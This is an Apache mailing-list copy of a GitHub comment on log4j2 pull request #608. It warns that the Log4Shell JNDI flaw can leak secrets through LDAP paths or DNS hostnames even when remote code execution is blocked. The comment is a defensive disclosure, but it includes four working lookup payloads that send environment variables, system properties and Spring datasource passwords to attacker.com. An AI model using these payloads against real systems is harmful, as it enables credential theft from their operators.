ahahu commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-991354707
I'd also like to stress, that it is not sufficient to mitigate this
vulnerability by using a JRE/JDK version which prevents the RCE, nor should you
rely solely on your firewalls dropping outgoing TCP traffic.
The reason is, that the vulnerability also has the potential for leaking
sensitive information via the LDAP request or via DNS.
Variable substition in the payload can be nested and one can use the "sys",
"env" or "bundle" keywords to access sensitive data, which than is either used
in the LDAP URL path or in the hostname.
Example for exfiltrating an environment variable containing a password used
in the URL path
`${jndi:ldap://www.attacker.com:1389/${env:MYSQL_PASSWORD}`
This could be resolved to ldap://www.attacker.com:1389/mysecretpassword for
example.
Example for exfiltrating an environment variable containing a password in
the hostname part:
`${jndi:ldap://${env:MYSQL_PASSWORD}.attacker.com:1389/a}`
This could be resolved to ldap://mysecretpassword.attacker.com:1389/a for
example
Of course this will fail if certain special characters are used in the
password.
Example for exfiltrating the property "spring.datasource.password" from the
application.properties file of a spring boot application:
`${jndi:ldap://${bundle:application:spring.datasource.password}.attacker.com:1389/a}`
Example for exfiltrating a system property that was passed through command
line:
`${jndi:ldap://${sys:db.password}.attacker.com:1389/a}`
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
